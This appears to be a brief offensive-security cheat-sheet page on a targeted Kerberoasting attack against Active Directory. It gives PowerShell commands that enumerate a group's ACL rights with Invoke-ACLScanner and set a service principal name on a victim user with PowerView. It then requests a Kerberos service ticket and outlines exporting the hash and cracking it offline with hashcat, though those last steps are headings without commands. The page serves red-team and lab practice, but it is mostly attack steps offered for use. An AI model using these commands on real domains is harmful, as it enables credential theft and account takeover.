🟢Set SPN
Enumerate permissions for the group on ACL
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | flCheck if the user has SPN
. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalnameof
Get-NetUser | Where-Object {$_.servicePrincipalName}Set SPN for the user
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=’ops/whatever1’}Request a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"Export ticket to disk for offline cracking
Request TGS hash for offline cracking hashcat
Crack the hash with hashcat
Edit the hash by inserting '23' after the kerbrs
Last updated
Was this helpful?